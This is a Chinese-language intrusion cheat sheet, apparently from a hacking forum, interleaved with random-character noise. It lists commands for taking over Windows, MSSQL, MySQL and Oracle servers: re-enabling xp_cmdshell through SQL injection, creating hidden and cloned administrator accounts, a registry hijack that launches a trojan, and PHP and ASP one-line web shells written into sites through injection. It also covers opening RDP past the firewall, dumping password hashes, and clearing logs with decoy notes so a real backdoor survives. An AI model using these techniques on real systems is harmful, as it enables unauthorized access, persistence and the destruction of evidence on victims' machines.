0 _- V( C$ z4 ~3 F( `9 g6 d0 M1.net user administrator /passwordreq:no
9 l7 F# W0 G. w/ E! k这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了8 @- _1 t: \, l, ^ M
2.比较巧妙的建克隆号的步骤: c7 R0 `6 `, g6 y. f) B* U+ b3 m
先建一个user的用户5 y# _( T: c7 v2 ~. ]
然后导出注册表。然后在计算机管理里删掉: ^. ?( y/ l2 r% S, z0 @9 b0 X
在导入,在添加为管理员组
! A8 P# _6 I3 \5 V1 j; l5 d4 i3.查radmin密码5 {3 C; G0 X4 S9 c
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
1 L4 O3 x, p* t, h* S0 T8 B4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options], M n1 a4 V M, s! b
建立一个"services.exe"的项
) ^: L' Q. Y) F2 }$ {再在其下面建立(字符串值)
( T( k- S/ i1 U键值为mu ma的全路径1 |* ?- e g c$ A- r/ X
5.runas /user:guest cmd
$ n5 Y: m6 I, h F测试用户权限!) G7 y% J4 o& r$ h+ y2 S( K0 F
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?1 O# q, U% N H( [$ z- C h; b
7.入侵后漏洞修补、痕迹清理,后门置放:
6 J" t, n" f$ f; W# {基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
' \& S) w4 I7 B8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
5 ]/ c! o' \7 R7 v+ V0 }7 h/ Q" U" \2 }
for example
4 ~4 K' o5 ?3 ^/ P# F
; X: B/ S+ ]+ r8 ?3 P) c! ~declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'8 s. I, w/ A7 G# A9 o2 e
6 [+ }; N; j7 _6 n# P
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'2 T% r& q6 j% T, J1 x3 n
+ k! o- W1 i* F9 [9:MSSQL SERVER 2005默认把xpcmdshell 给ON了9 A W" {8 A6 r- y) ^
如果要启用的话就必须把他加到高级用户模式
e. q$ o2 L; w" _" Y可以直接在注入点那里直接注入
1 N9 K" ~! y- k( I$ _; K7 Mid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--/ S6 _1 r$ j- l. t/ @3 F
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
: g. e7 A; \, i) R( P4 n1 e) n或者
* g& V& B: m! z$ isp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'; q: m3 \+ [5 s" A7 D* P& d
来恢复cmdshell。& g/ y" |: e% ?; }# f1 e, {
; r. D4 Q1 P, W1 j分析器5 P9 k+ L$ E4 s
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--, r9 z7 h# `6 U, t$ F
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")7 z: A' g) _+ _) _% t
10.xp_cmdshell新的恢复办法
6 J/ r) R( g2 a/ J- p, Hxp_cmdshell新的恢复办法
! E0 L) h0 q3 x! z扩展储存过程被删除以后可以有很简单的办法恢复:2 S+ U( h3 y/ H4 Z% c
删除( p3 B, Q- F1 v# k
drop procedure sp_addextendedproc0 c( O! a5 }/ ?/ z+ E. C, X
drop procedure sp_oacreate
5 Z' H) b3 @" e+ G6 R( g F7 j, texec sp_dropextendedproc 'xp_cmdshell'8 m1 \8 |; x& ]9 n0 L
0 j( }% \- f% Z6 V$ H) J恢复( B" ?/ m9 n w6 s! q9 N
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
3 y4 P: Q8 N8 d1 s. ~+ o9 vdbcc addextendedproc ("xp_cmdshell","xplog70.dll")* m! {& b+ ?. j( C! x
2 j' n* S4 S8 e, Q, j9 |这样可以直接恢复,不用去管sp_addextendedproc是不是存在
- C- Y; }2 I( H' v1 v; E% t
$ G' `+ P5 g) D, d8 Q-----------------------------* m7 {$ {7 ?1 @! H7 X7 J4 {
8 D/ A4 `0 N3 J4 ]( [1 E# C9 M2 ~
删除扩展存储过过程xp_cmdshell的语句:
" Q! K5 a( Q8 A ?% }) e. E( uexec sp_dropextendedproc 'xp_cmdshell'8 A8 {7 A0 V, p
% I8 I( X' a/ o& B% m8 G7 y恢复cmdshell的sql语句5 O. ^" u/ y, G2 _* \8 M
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'$ S. v, x S: r( u
% Q% e) q* {4 F6 ~' R$ ? _8 P% @& P1 \0 J9 Q- y
开启cmdshell的sql语句+ ]; L6 }* Y4 P2 z3 K, O
5 Q: s* T: i1 G, Y2 m7 }
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'* r- h4 ?' d! \
$ a( U- T0 h$ b6 b判断存储扩展是否存在7 F% Y' m( V; I- l6 H
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
+ w6 h. E& v o- v- z0 m# c. `返回结果为1就ok
% [, V2 N7 d3 p. f; y
& ^* K( A1 @" j* K0 Q S8 {恢复xp_cmdshell
& \' o" m3 ^6 F- b7 p" @8 h/ Jexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell', c/ `3 O9 P/ ~2 x3 }1 L1 b
返回结果为1就ok* p! _# u0 E4 c
; ?4 v7 Z% S) \4 e) S6 R5 R$ e否则上传xplog7.0.dll
, g' ]9 x& y8 k- l7 texec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'2 ^* t P' H" ~
j7 K$ T# U. f+ i3 W. k
堵上cmdshell的sql语句0 T8 |3 o/ H" V2 _
sp_dropextendedproc "xp_cmdshel
; T0 q) P. X- q+ P) F, R-------------------------
9 N) R2 B: M0 m7 r I" ]& H9 n清除3389的登录记录用一条系统自带的命令:
, L# S7 z( h B. D. preg delete "hkcu\Software\Microsoft\Terminal Server Client" /f4 U5 U: m1 D7 H7 H3 ?
7 D `. q8 w& G4 W' u) a( I8 [8 |然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件9 A) l% u$ k2 F& n$ i Y
在 mysql里查看当前用户的权限" v9 e' p8 w6 E6 v
show grants for
( M; V3 `# ~ v* M2 |. Z% H9 ]% S
6 t/ U+ z+ }4 b% P. M; G+ Z: |* u以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
. w& ^$ J/ f* C3 @+ y5 a
; T$ i$ J9 n" X! t H8 J: N( e9 z$ K J+ s+ B
Create USER 'itpro'@'%' IDENTIFIED BY '123';2 x+ o# z& a! f6 b4 f h
* ]& h$ D M9 @
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
. |; _; c; ~& O6 s2 S2 W [! [% p
& n4 q% }0 T oMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0& g2 d5 `9 d3 [' S. Y; F1 x# ^6 S
. O% O$ E! E( @) V* FMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;& S6 O. R+ s$ f$ y1 q4 A
" l8 G w! t6 q# m4 p1 w/ G- i
搞完事记得删除脚印哟。
5 v3 u% {+ G# U. ^4 S t4 H
6 ^$ c$ O# c+ t4 D9 c* ZDrop USER 'itpro'@'%';" W- K* ]7 i/ ?! a
& n# K/ m+ |- i& ~. m! U, FDrop DATABASE IF EXISTS `itpro` ;% J6 z& I, p; O3 i$ h1 c/ y( P3 ]
; Q. t% K1 A0 [ r! ]- g" X
当前用户获取system权限8 q( ?$ v' v" z) d: @) k0 e
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
5 H: |" O; r5 [0 q- Vsc start SuperCMD
7 c4 _# L) _/ c/ W- _程序代码* ]2 o0 A1 j4 ]* g9 A2 F
<SCRIPT LANGUAGE="VBScript">
3 I' [4 Y% |% U* ^4 yset wsnetwork=CreateObject("WSCRIPT.NETWORK")5 n' p R" p5 {2 B1 Y4 E7 C
os="WinNT://"&wsnetwork.ComputerName8 E# ~3 ~- V8 X
Set ob=GetObject(os)
4 O( R( @( ]/ ~' oSet oe=GetObject(os&"/Administrators,group")
# ? r( {: h) L) t$ \$ {Set od=ob.Create("user","nosec")% P3 I, {( y1 B |8 N
od.SetPassword "123456abc!@#"
4 a% _* i7 Q. M9 n! hod.SetInfo
) v3 Z( o2 d" p- ^* d/ {Set of=GetObject(os&"/nosec",user)+ O! y" H% c% K
oe.add os&"/nosec"; j* v% K' [6 W& D7 i4 X
</Script>
/ Z$ \& x3 {. R/ d5 k<script language=javascript>window.close();</script>3 T( A2 e; Y9 d* O; d, }
$ g/ L9 p: c. \! \
* J0 ~( Q5 U, ]: y. S" E) Q! Q& V' V
- i8 e* G# g( O2 ^2 O% O4 t; N$ ~; r3 _3 T! D- @9 @, }
突破验证码限制入后台拿shell3 _. L: u- E! [8 y
程序代码
. C' p* k+ ?; t; UREGEDIT4 4 a* I/ c" a% v
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] 0 C: t% g! v7 S9 E) [ u; ~
"BlockXBM"=dword:00000000
( y- u W+ X/ H
( W, F ^& p I* |保存为code.reg,导入注册表,重器IE
5 @: M2 ]! K& I2 t I& U' p4 e% s e就可以了
$ C0 g$ Q8 M1 m: A2 X3 cunion写马) [: `+ n2 v; K) @+ @) L
程序代码
3 @7 ?& T+ p9 z" _www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*" h2 m/ m' {' \) Z6 F" {+ {
4 ]: z2 x, Y$ V3 Y+ b) H! k: @应用在dedecms注射漏洞上,无后台写马
3 t4 @& ~: y2 V" _# Vdedecms后台,无文件管理器,没有outfile权限的时候$ B/ |8 z1 _! |. X9 k
在插件管理-病毒扫描里" d& P9 C, q; N6 Q. F/ G' |7 f9 x
写一句话进include/config_hand.php里 K* q5 Q* _! z# a: M6 ]' C
程序代码: E; }- H8 T/ `+ S/ \; s
>';?><?php @eval($_POST[cmd]);?>% h7 \6 d% K/ M" A" [0 w
, K) n; l. n2 z6 H6 \
( [; j/ @ L9 O0 Q& }/ o4 d如上格式
# v4 i2 s3 m& ?$ G+ X4 T; |, C5 G' R
" C5 @+ K C, D( ioracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
7 @2 p" L1 t* T/ q4 t* d程序代码 o5 p4 _1 G& t' k$ |; j( J' L+ c6 |
select username,password from dba_users;
8 W" J' ]; X: z' `% w1 D( x- J$ @; V A' r" I! L& H+ m$ _
2 m7 y! x) i& t' D2 |5 u$ w- G
mysql远程连接用户, x# Z, l% X3 n4 L( w
程序代码
! Y+ v8 d7 m/ i+ P2 K q8 \. V+ j5 S+ D0 V
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';* T. y4 l! ]0 `; b9 t: t
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION& s+ F' b% `" R4 F4 F
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0, L, y7 i- p5 O5 q
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
% v; B! v' x; m! v/ w
" m/ C- ]" F) Q+ D
# U% x; D8 N; k8 E" _; o
, N" p: V% k2 M
5 N0 l. M7 t' T( _) D! ~! g4 T' Jecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0- t9 p7 u B9 T9 P
; r( J& O2 n! d1.查询终端端口
/ J3 V; ?' q. O r4 P# f3 S
8 I( N0 w1 ]: ]7 q# yxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber; [- a% C8 Z2 i1 }' _0 p& k
" g% B- h' y* w; h通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp": N6 ~; ~4 b- P0 \8 g6 J' p
type tsp.reg
2 x# Y z n: U) d2 F' }' z0 `: V" I
2.开启XP&2003终端服务
6 L5 a5 W% F6 ~% d" N6 [* `+ N" Q) d
, @8 C# q; _& g. m5 k
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
' j8 r7 [% n& T+ f% l, H9 J$ O) k: d% f3 f$ q; \
( i5 P! M |( L n+ y: {+ c0 s
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
1 X7 p( b8 C$ Z( r: W" ~
6 `8 \. E' a6 q+ S' e( _& R. W3.更改终端端口为20008(0x4E28)& C) E5 F2 f i% q; J
# }' c- M; V8 c8 D' D: f g% P# J& \
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f' O9 g8 V& i4 Y" X, ~
( _ A' K' ^, ?! t: oREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f2 q% ~$ X9 m, b1 i, `
7 A2 y( s6 [$ H# a, U7 w+ q/ j
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
/ U' g; G6 m7 }$ R: B3 V
9 k. j8 R, a# Q6 Q5 k) A& PREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f, f! w/ v! k; z0 R0 d* v" U0 U
1 v' w& ^" } R+ B
u d5 O% H9 h+ R6 Y' K: ]. K5.开启Win2000的终端,端口为3389(需重启)
! x# M' f, S2 T1 V* ~8 l) o n
u4 x: U# q/ k3 W! D. B0 |! Jecho Windows Registry Editor Version 5.00 >2000.reg $ j2 R, @4 W2 J9 [8 S: W7 v
echo. >>2000.reg7 O) L& I/ ^% ?( u7 i+ B# H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 8 z, K/ K# }3 E% w; ]8 B: `
echo "Enabled"="0" >>2000.reg + p- a! W2 z) W$ {+ k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
# _( T( ?* P G/ `7 ]echo "ShutdownWithoutLogon"="0" >>2000.reg 8 |1 m' j0 k) N. [; H& M, S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
9 k! H5 `& X' K/ I$ becho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
4 A# h( z( @& E* K' } i) Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
: [; {- B1 y* }' o* fecho "TSEnabled"=dword:00000001 >>2000.reg
6 B& W# d/ j5 z6 Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
; L3 X, j3 Q" p8 j9 V* k2 Decho "Start"=dword:00000002 >>2000.reg
0 G R! a' s& Q8 m; decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg / K5 J% I4 Q3 G2 `
echo "Start"=dword:00000002 >>2000.reg # @& N) M; m- C
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ( c' ^& P& w: Y. ?, {+ \
echo "Hotkey"="1" >>2000.reg * h' I3 B, g8 u' p& \: F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ! ?2 O" |) n' S( U& d+ \
echo "ortNumber"=dword:00000D3D >>2000.reg - ?% \' \; N# }0 G
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg ; H0 k0 T6 k; r( k. J, e
echo "ortNumber"=dword:00000D3D >>2000.reg
" \& L/ W# J) I: v" s. l+ `1 i- |/ c7 m9 V! x/ U
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
; _7 X% [" B. p3 G7 _
4 R% T( {0 u! m* a- a9 } D$ T@ECHO OFF & cd/d %temp% & echo [version] > restart.inf0 D" j R: w' s) n4 m @
(set inf=InstallHinfSection DefaultInstall)
- e. z$ ^ D" d1 [0 Y/ n Wecho signature=$chicago$ >> restart.inf
3 H# M" y4 x# Z3 o! s$ y2 b/ U# Pecho [defaultinstall] >> restart.inf. B& U' N! v6 o) J
rundll32 setupapi,%inf% 1 %temp%\restart.inf
3 Z6 B8 y( E* W- d8 _6 n0 d
4 X/ s2 f6 {0 y! H
I( g+ C8 C9 I1 k( d2 ?7.禁用TCP/IP端口筛选 (需重启); P* x D5 z7 u" `" X7 X
f$ ~# E0 _, v% q
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
. [! B2 t) ` W% r3 |; Z7 _1 w' F7 U
8.终端超出最大连接数时可用下面的命令来连接
% k2 K; k: y" B( L. [
3 K3 w+ w- K; n9 U' ?; Tmstsc /v:ip:3389 /console
+ | G$ q, C8 P* {. Q. @
4 V% a) P& X+ @' e2 o3 N9.调整NTFS分区权限
$ _& C. H: I* E" q$ J7 W7 q# F9 w2 b
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)% M& F7 S9 B5 U- C6 P- o/ C7 c. J
) z. W7 B) m1 a, n3 d' f# r2 [
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)8 G% l& i1 c( |- x4 S# w
% _4 o4 [+ A6 f- o7 [------------------------------------------------------
: _3 Z6 O; y. }9 H% G4 G3389.vbs
/ R; t6 t7 Q( c6 x/ q- G1 K& VOn Error Resume Next
5 A& L4 L, p9 ?. c2 cconst HKEY_LOCAL_MACHINE = &H80000002
! z4 F% `: j$ r2 q2 R: H3 A0 jstrComputer = "."3 Q4 ^: [+ W) ^* v" r
Set StdOut = WScript.StdOut
5 K( B4 J$ ~6 j6 o: {Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_' w+ s6 G2 { Q2 q6 n2 Y& x
strComputer & "\root\default:StdRegProv")
' \4 V" D& q& E8 v8 C+ N: }* UstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
0 H% `4 w. |! M6 z# b# ]' A7 _oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath' J Q7 y% }, L( C% e: i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
# d, M! V7 Q+ L: S8 b. [- eoreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
6 I0 F: n+ R6 {5 {strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp", G6 i6 j+ {8 W6 e" W+ @
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
! D6 u7 e. Q9 S8 {5 {. n" RstrValueName = "fDenyTSConnections"* x8 ], }; D0 n" Z. Z- E( S
dwValue = 0
2 f- h6 ]/ I1 r; q+ E9 Boreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
- w2 t3 Z' _. V1 O7 j* `4 qstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
Y2 b# t q N% g% r ?! qstrValueName = "ortNumber"
' x& @/ | |5 g( L9 q, {dwValue = 3389- A a L L4 {) E& i4 c" e
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue3 X" E/ L/ W$ P
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
- V- ^( @ i3 V" V1 U$ E8 q# h# vstrValueName = "ortNumber" l o" A' E8 |6 t$ ^
dwValue = 3389) A) V! z5 |& U2 @) H- {! \
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
: v$ V# }' W7 ?% @8 sSet R = CreateObject("WScript.Shell")
5 U: }* K2 w3 c9 p5 tR.run("Shutdown.exe -f -r -t 0") # o( I6 g% M- Q& ?7 q8 w
4 G1 ^6 F% L2 C3 W删除awgina.dll的注册表键值
" A$ [* o0 C9 h; e( \& s7 k程序代码
* c1 b: p4 j8 L M7 E/ N8 F! V- F; ?3 ^/ t4 M/ G
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
9 P: q5 r$ t4 H) E. M R$ A! i- W; S. [& c
; e. i: U3 V4 Q" l$ G
+ D4 j8 A& b- d. U' ?3 g( g+ B
7 I1 i) I. H3 n% T% ^6 B, B, K程序代码
% f& o5 h, B# g& R- A9 AHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash& T# `7 N P) ~! q
9 a) M" Z1 w* G2 ^) G& ~/ j设置为1,关闭LM Hash. ]3 {2 _$ P+ z2 [2 }8 E
; X7 V' U2 h; _1 e: B4 n
数据库安全:入侵Oracle数据库常用操作命令
1 i. ^4 Q s/ w: `* f- U/ W最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
# N" r& P4 m2 `1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。% c! X0 Z4 H: f4 G& t( i- m. F, {
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
+ C! z& y! S9 c3 c; ~8 y3、SQL>connect / as sysdba ;(as sysoper)或
7 m* X5 E; g0 Q! fconnect internal/oracle AS SYSDBA ;(scott/tiger)
. y" s- X5 N/ m0 Nconn sys/change_on_install as sysdba;
% o. m1 n! P; \ J: z: c4、SQL>startup; 启动数据库实例
9 N1 t# j' s5 H" L7 F5、查看当前的所有数据库: select * from v$database;7 W6 i( v3 c8 [6 K _4 L
select name from v$database;6 b+ h. X# k6 O# z4 [( f3 ^
6、desc v$databases; 查看数据库结构字段1 W8 B' L$ _" A/ u' d3 i
7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
8 F: k: E; ?2 P& g! |" lSQL>select * from V_$PWFILE_USERS;- m6 X4 a; F9 m. v- D/ c/ F7 g
Show user;查看当前数据库连接用户; b+ q( g. E9 q5 p2 J* I
8、进入test数据库:database test;
% @" ^6 M+ X$ F# w; x: i; b9、查看所有的数据库实例:select * from v$instance;' P6 k) D! ^) d; I
如:ora9i
: I* E0 ]9 Z' M, E2 Y& f10、查看当前库的所有数据表: e c( o: T# D
SQL> select TABLE_NAME from all_tables;0 g* e) Z/ J; D% ^1 ^' U, t
select * from all_tables;
( L0 R6 P6 ]; ?SQL> select table_name from all_tables where table_name like '%u%';& e" e& ^& K' h+ d- w2 Q
TABLE_NAME8 T9 }1 T7 Q/ Q
------------------------------6 `8 i A! h" R; ?6 [. Q+ w
_default_auditing_options_+ ?0 O1 Y& ~2 b; a- }
11、查看表结构:desc all_tables;
* o v+ B: f6 I: w4 z12、显示CQI.T_BBS_XUSER的所有字段结构:
- r) i* s+ l' z+ O1 w1 u/ b2 Udesc CQI.T_BBS_XUSER;
$ J! }( O; L$ q5 ?$ e13、获得CQI.T_BBS_XUSER表中的记录:
8 O) ^1 e+ e! _2 u( wselect * from CQI.T_BBS_XUSER;, O4 u: Q# T* f6 u( X; Y
14、增加数据库用户:(test11/test)% z9 _% O. l4 ?3 Q& ~ v5 D' i
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;* Q( f/ k$ q" l9 v, J9 w, r
15、用户授权:
5 Q' a6 A @% J* ?1 E' H' W" Lgrant connect,resource,dba to test11;
6 }1 U6 G g2 {0 _' h3 x# y2 j3 Tgrant sysdba to test11;# {$ a) z' ]' U! N1 U4 I! X- g8 z
commit;, a: s. w" ~( ^5 H: @( E" v
16、更改数据库用户的密码:(将sys与system的密码改为test.)
$ O; g8 t/ M- z' m) salter user sys indentified by test;7 [4 {. d- r3 b: I1 n. l6 c
alter user system indentified by test;
# ]" _, Q9 k/ ~/ K$ \! b
/ ~7 y/ F" D$ TapplicationContext-util.xml4 Y6 z1 b1 `/ y+ j! j1 U; N. H4 G
applicationContext.xml
_# d" i7 @& Y1 Y8 P, g# r. sstruts-config.xml4 C6 _" X* d c& v2 Y$ |: `
web.xml( P" v$ T5 V& v. S- g; I
server.xml. l" e% o! H% E3 k! o! D) j
tomcat-users.xml
1 J2 F# p B" `9 n" w) Shibernate.cfg.xml
9 z4 ^3 t& G. Wdatabase_pool_config.xml
+ ?; q/ t: n: k3 T2 b
- P4 x, a" ^/ ~) G
, w2 o- h/ a0 x) Z\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置5 W+ _2 e( f4 _+ L) S
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini2 b* W# h1 Z3 [' r# b. M
\WEB-INF\struts-config.xml 文件目录结构/ ` ?+ z5 ]" q, f1 ?/ p# o! ]
3 ^, k$ K2 i3 i
spring.properties 里边包含hibernate.cfg.xml的名称; y6 M B+ M ^7 s$ o" [: ]4 s
- ~6 x3 H( t* H' Y" i4 c* V- Z* {+ Z) Y# t
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
2 T. P: s" c' k0 @$ }% }2 \/ _; n+ v1 x! L8 Q. g
如果都找不到 那就看看class文件吧。。- y z$ n7 |3 |, N" H# M
& J( t3 I7 M+ ^测试1:
7 Q- K( b- ~3 S# n/ c+ cSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t18 g) @& ~3 m1 Z8 o8 f' A4 {$ p9 ^
V2 @8 D% z8 \: [* G+ O0 d
测试2:
! X$ S; k. h6 i! d# @( U ~8 G; `" Z7 C8 Y7 L6 {
create table dirs(paths varchar(100),paths1 varchar(100), id int)* Y- g1 l3 M: s; D* u$ ^8 F
5 k' l: m" j4 T
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) i& U0 W W! _. K; Y8 Y
- M6 o3 i2 d# [+ c& A; ]2 Q/ G
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
' F1 z2 _4 t# q9 X/ @: D4 s+ z: Q# C+ @, D0 Q1 j# s: Z
查看虚拟机中的共享文件:1 q" L9 G% s- k9 ^6 a
在虚拟机中的cmd中执行
* E8 ~; }, F+ H5 ?2 G- Z7 M: x8 A: v\\.host\Shared Folders8 x3 W$ @, i$ k3 T& J
. B8 `9 w1 W0 ~1 ucmdshell下找终端的技巧( u/ m! x5 @# \; T! D
找终端:
4 ?1 t7 k# t! }+ U( W. M+ a# T+ r第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
! N: f: d4 O, [8 e& @ 而终端所对应的服务名为:TermService
" H [ I2 Y/ l& b$ D$ q第二步:用netstat -ano命令,列出所有端口对应的PID值! ; a/ U- w: ~$ `
找到PID值所对应的端口
/ L8 @' F1 k7 E* C o; Z' m2 O8 R- j7 R
查询sql server 2005中的密码hash4 D( Y% o( {/ w W3 G5 q2 I" {2 h
SELECT password_hash FROM sys.sql_logins where name='sa'( N! o* [- E, s2 n
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
6 C/ ^0 X4 j+ vaccess中导出shell' g2 G; x2 f1 a% |- n
& a1 c, [& C! }, \
中文版本操作系统中针对mysql添加用户完整代码:
% O. H# L9 y( F! I/ I4 h
$ k; Z( I; m* ? t1 M6 X* i+ [use test;
